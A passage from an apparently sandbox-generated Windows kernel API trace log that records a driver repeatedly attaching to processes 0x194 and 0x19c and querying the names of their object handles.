ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.800] ObfDereferenceObject (Object=0xffffe000697d5920) returned 0x7ff2 [0264.800] IoCompleteRequest () returned 0x0 [0264.800] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.800] PsAcquireProcessExitSynchronization () returned 0x0 [0264.800] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.811] ObReferenceObjectByHandle (in: Handle=0x180, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d5bc0, HandleInformation=0x0) returned 0x0 [0264.811] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.811] PsReleaseProcessExitSynchronization () returned 0x2 [0264.811] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x3801e [0264.811] ObQueryNameString (in: Object=0xffffe000697d5bc0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.811] ObfDereferenceObject (Object=0xffffe000697d5bc0) returned 0x7ffe [0264.811] IoCompleteRequest () returned 0x0 [0264.811] PsLookupProcessByProcessId (in: ProcessId=0x194, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.811] PsAcquireProcessExitSynchronization () returned 0x0 [0264.811] KeStackAttachProcess (in: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067ec7080, ApcState=0xffffd000b1b8e400) [0264.814] ObReferenceObjectByHandle (in: Handle=0x184, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xffffe00068533101, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000697d7900, HandleInformation=0x0) returned 0x0 [0264.814] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.814] PsReleaseProcessExitSynchronization () returned 0x2 [0264.814] ObfDereferenceObject (Object=0xffffe00067ec7080) returned 0x3801d [0264.814] ObQueryNameString (in: Object=0xffffe000697d7900, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.814] ObfDereferenceObject (Object=0xffffe000697d7900) returned 0x7ffe [0264.814] IoCompleteRequest () returned 0x0 [0264.814] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x19c) returned 0x0 [0264.814] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.814] PsAcquireProcessExitSynchronization () returned 0x0 [0264.814] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.815] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00067eda8f0, HandleInformation=0x0) returned 0x0 [0264.815] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.815] PsReleaseProcessExitSynchronization () returned 0x2 [0264.815] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280ca [0264.815] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068a64044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00068a64044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.815] ObfDereferenceObject (Object=0xffffe00067eda8f0) returned 0x7fff [0264.815] IoCompleteRequest () returned 0x0 [0264.815] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.815] PsAcquireProcessExitSynchronization () returned 0x0 [0264.815] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.815] ObReferenceObjectByHandle (in: Handle=0x78, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148071340, HandleInformation=0x0) returned 0x0 [0264.815] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.815] PsReleaseProcessExitSynchronization () returned 0x2 [0264.815] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c9 [0264.815] ObQueryNameString (in: Object=0xffffc00148071340, ObjectNameInfo=0xffffe0006a40f044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40f044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.815] ObfDereferenceObject (Object=0xffffc00148071340) returned 0x8000 [0264.815] IoCompleteRequest () returned 0x0 [0264.815] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.815] PsAcquireProcessExitSynchronization () returned 0x0 [0264.815] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.815] ObReferenceObjectByHandle (in: Handle=0x94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000693e4090, HandleInformation=0x0) returned 0x0 [0264.815] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.815] PsReleaseProcessExitSynchronization () returned 0x2 [0264.815] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c8 [0264.815] ObQueryNameString (in: Object=0xffffe000693e4090, ObjectNameInfo=0xffffe00069041044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00069041044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.815] ObfDereferenceObject (Object=0xffffe000693e4090) returned 0x8000 [0264.815] IoCompleteRequest () returned 0x0 [0264.815] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.815] PsAcquireProcessExitSynchronization () returned 0x0 [0264.815] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.815] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001489b1d00, HandleInformation=0x0) returned 0x0 [0264.815] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.815] PsReleaseProcessExitSynchronization () returned 0x2 [0264.815] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c7 [0264.815] ObQueryNameString (in: Object=0xffffc001489b1d00, ObjectNameInfo=0xffffe0006a4147c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a4147c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.815] ObfDereferenceObject (Object=0xffffc001489b1d00) returned 0x8000 [0264.815] IoCompleteRequest () returned 0x0 [0264.815] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.815] PsAcquireProcessExitSynchronization () returned 0x0 [0264.815] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.815] ObReferenceObjectByHandle (in: Handle=0x108, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001489955b0, HandleInformation=0x0) returned 0x0 [0264.815] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.815] PsReleaseProcessExitSynchronization () returned 0x2 [0264.815] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c6 [0264.816] ObQueryNameString (in: Object=0xffffc001489955b0, ObjectNameInfo=0xffffe0006a44d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44d7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.816] ObfDereferenceObject (Object=0xffffc001489955b0) returned 0x8000 [0264.816] IoCompleteRequest () returned 0x0 [0264.816] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.816] PsAcquireProcessExitSynchronization () returned 0x0 [0264.816] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.816] ObReferenceObjectByHandle (in: Handle=0x10c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148989b10, HandleInformation=0x0) returned 0x0 [0264.816] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.816] PsReleaseProcessExitSynchronization () returned 0x2 [0264.816] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c5 [0264.816] ObQueryNameString (in: Object=0xffffc00148989b10, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.816] ObfDereferenceObject (Object=0xffffc00148989b10) returned 0x8000 [0264.816] IoCompleteRequest () returned 0x0 [0264.816] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.816] PsAcquireProcessExitSynchronization () returned 0x0 [0264.816] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.816] ObReferenceObjectByHandle (in: Handle=0x114, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148950b70, HandleInformation=0x0) returned 0x0 [0264.816] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.816] PsReleaseProcessExitSynchronization () returned 0x2 [0264.816] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c4 [0264.816] ObQueryNameString (in: Object=0xffffc00148950b70, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.816] ObfDereferenceObject (Object=0xffffc00148950b70) returned 0x8000 [0264.816] IoCompleteRequest () returned 0x0 [0264.816] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.816] PsAcquireProcessExitSynchronization () returned 0x0 [0264.816] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.816] ObReferenceObjectByHandle (in: Handle=0x118, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069d8f770, HandleInformation=0x0) returned 0x0 [0264.816] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.816] PsReleaseProcessExitSynchronization () returned 0x2 [0264.816] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c3 [0264.816] ObQueryNameString (in: Object=0xffffe00069d8f770, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.816] ObfDereferenceObject (Object=0xffffe00069d8f770) returned 0x7fff [0264.816] IoCompleteRequest () returned 0x0 [0264.816] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.816] PsAcquireProcessExitSynchronization () returned 0x0 [0264.816] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.816] ObReferenceObjectByHandle (in: Handle=0x1a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148939660, HandleInformation=0x0) returned 0x0 [0264.816] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.816] PsReleaseProcessExitSynchronization () returned 0x2 [0264.816] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c2 [0264.816] ObQueryNameString (in: Object=0xffffc00148939660, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.816] ObfDereferenceObject (Object=0xffffc00148939660) returned 0x8000 [0264.816] IoCompleteRequest () returned 0x0 [0264.816] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.817] PsAcquireProcessExitSynchronization () returned 0x0 [0264.817] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.817] ObReferenceObjectByHandle (in: Handle=0x1c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148595ae0, HandleInformation=0x0) returned 0x0 [0264.817] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.817] PsReleaseProcessExitSynchronization () returned 0x2 [0264.817] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c1 [0264.817] ObQueryNameString (in: Object=0xffffc00148595ae0, ObjectNameInfo=0xffffe0006a33d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a33d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.817] ObfDereferenceObject (Object=0xffffc00148595ae0) returned 0x8000 [0264.817] IoCompleteRequest () returned 0x0 [0264.817] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.817] PsAcquireProcessExitSynchronization () returned 0x0 [0264.817] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.817] ObReferenceObjectByHandle (in: Handle=0x1c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006980c2d0, HandleInformation=0x0) returned 0x0 [0264.817] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.817] PsReleaseProcessExitSynchronization () returned 0x2 [0264.817] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280c0 [0264.817] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3f8044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a3f8044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0264.817] ObfDereferenceObject (Object=0xffffe0006980c2d0) returned 0x7ffe [0264.817] IoCompleteRequest () returned 0x0 [0264.817] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.817] PsAcquireProcessExitSynchronization () returned 0x0 [0264.817] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.817] ObReferenceObjectByHandle (in: Handle=0x1d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148578120, HandleInformation=0x0) returned 0x0 [0264.817] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.817] PsReleaseProcessExitSynchronization () returned 0x2 [0264.817] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280bf [0264.817] ObQueryNameString (in: Object=0xffffc00148578120, ObjectNameInfo=0xffffe00068178044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068178044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.817] ObfDereferenceObject (Object=0xffffc00148578120) returned 0x8000 [0264.817] IoCompleteRequest () returned 0x0 [0264.817] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.817] PsAcquireProcessExitSynchronization () returned 0x0 [0264.817] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.817] ObReferenceObjectByHandle (in: Handle=0x1d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001496b74b0, HandleInformation=0x0) returned 0x0 [0264.817] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.817] PsReleaseProcessExitSynchronization () returned 0x2 [0264.817] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280be [0264.817] ObQueryNameString (in: Object=0xffffc001496b74b0, ObjectNameInfo=0xffffe00068a59684, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe00068a59684, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.817] ObfDereferenceObject (Object=0xffffc001496b74b0) returned 0x8000 [0264.817] IoCompleteRequest () returned 0x0 [0264.817] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.817] PsAcquireProcessExitSynchronization () returned 0x0 [0264.817] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.817] ObReferenceObjectByHandle (in: Handle=0x1e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc0014857e6b0, HandleInformation=0x0) returned 0x0 [0264.817] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.817] PsReleaseProcessExitSynchronization () returned 0x2 [0264.818] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280bd [0264.818] ObQueryNameString (in: Object=0xffffc0014857e6b0, ObjectNameInfo=0xffffe0006a816044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a816044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.818] ObfDereferenceObject (Object=0xffffc0014857e6b0) returned 0x8000 [0264.818] IoCompleteRequest () returned 0x0 [0264.818] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.818] PsAcquireProcessExitSynchronization () returned 0x0 [0264.818] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.818] ObReferenceObjectByHandle (in: Handle=0x1ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001494272c0, HandleInformation=0x0) returned 0x0 [0264.818] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.818] PsReleaseProcessExitSynchronization () returned 0x2 [0264.818] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280bc [0264.818] ObQueryNameString (in: Object=0xffffc001494272c0, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.818] ObfDereferenceObject (Object=0xffffc001494272c0) returned 0x8000 [0264.818] IoCompleteRequest () returned 0x0 [0264.818] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.818] PsAcquireProcessExitSynchronization () returned 0x0 [0264.818] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.818] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001498ac710, HandleInformation=0x0) returned 0x0 [0264.818] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.818] PsReleaseProcessExitSynchronization () returned 0x2 [0264.818] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280bb [0264.818] ObQueryNameString (in: Object=0xffffc001498ac710, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.818] ObfDereferenceObject (Object=0xffffc001498ac710) returned 0x8000 [0264.818] IoCompleteRequest () returned 0x0 [0264.818] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.818] PsAcquireProcessExitSynchronization () returned 0x0 [0264.818] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.818] ObReferenceObjectByHandle (in: Handle=0x208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001498e6880, HandleInformation=0x0) returned 0x0 [0264.818] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.818] PsReleaseProcessExitSynchronization () returned 0x2 [0264.818] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280ba [0264.818] ObQueryNameString (in: Object=0xffffc001498e6880, ObjectNameInfo=0xffffe000691a37c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000691a37c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.818] ObfDereferenceObject (Object=0xffffc001498e6880) returned 0x8000 [0264.818] IoCompleteRequest () returned 0x0 [0264.818] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.818] PsAcquireProcessExitSynchronization () returned 0x0 [0264.818] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.818] ObReferenceObjectByHandle (in: Handle=0x218, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00148da7c00, HandleInformation=0x0) returned 0x0 [0264.818] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.818] PsReleaseProcessExitSynchronization () returned 0x2 [0264.818] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b9 [0264.818] ObQueryNameString (in: Object=0xffffc00148da7c00, ObjectNameInfo=0xffffe0006a44e484, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a44e484, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.818] ObfDereferenceObject (Object=0xffffc00148da7c00) returned 0x8000 [0264.819] IoCompleteRequest () returned 0x0 [0264.819] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.819] PsAcquireProcessExitSynchronization () returned 0x0 [0264.819] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.819] ObReferenceObjectByHandle (in: Handle=0x224, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc00149c3beb0, HandleInformation=0x0) returned 0x0 [0264.819] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.819] PsReleaseProcessExitSynchronization () returned 0x2 [0264.819] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b8 [0264.819] ObQueryNameString (in: Object=0xffffc00149c3beb0, ObjectNameInfo=0xffffe0006a359444, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a359444, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.819] ObfDereferenceObject (Object=0xffffc00149c3beb0) returned 0x8000 [0264.819] IoCompleteRequest () returned 0x0 [0264.819] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.819] PsAcquireProcessExitSynchronization () returned 0x0 [0264.819] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.819] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001492a1ac0, HandleInformation=0x0) returned 0x0 [0264.819] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.819] PsReleaseProcessExitSynchronization () returned 0x2 [0264.819] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b7 [0264.819] ObQueryNameString (in: Object=0xffffc001492a1ac0, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.819] ObfDereferenceObject (Object=0xffffc001492a1ac0) returned 0x7ff8 [0264.819] IoCompleteRequest () returned 0x0 [0264.819] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0264.819] PsAcquireProcessExitSynchronization () returned 0x0 [0264.819] KeStackAttachProcess (in: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe0006951c080, ApcState=0xffffd000b1b8e400) [0264.819] ObReferenceObjectByHandle (in: Handle=0x238, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffc001492a2630, HandleInformation=0x0) returned 0x0 [0264.819] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0264.819] PsReleaseProcessExitSynchronization () returned 0x2 [0264.819] ObfDereferenceObject (Object=0xffffe0006951c080) returned 0x280b6 [0264.819] ObQueryNameString (in: Object=0xffffc001492a2630, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0264.819] ObfDereferenceObject (Object=0xffffc001492a2630) returned 0x8000 [0264.819] IoCompleteRequest () returned 0x0 [0264.819] PsLookupProcessByProcessId (in: ProcessId=0x19c, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 